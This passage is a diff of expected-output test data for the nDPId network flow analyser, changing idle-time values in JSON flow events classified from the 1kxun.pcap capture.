-00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -653,21 +653,21 @@ 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1470104410885,"flow_last_seen":1470104428908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6132,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"119.235.235.84","dst_ip":"192.168.5.16","src_port":443,"dst_port":53406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00805{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104381895,"flow_last_seen":1470104382125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":633,"flow_tot_l4_payload_len":1497,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.145","src_port":49612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":419,"flow_first_seen":1470104382053,"flow_last_seen":1470104433789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":161031,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"183.131.48.144","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": 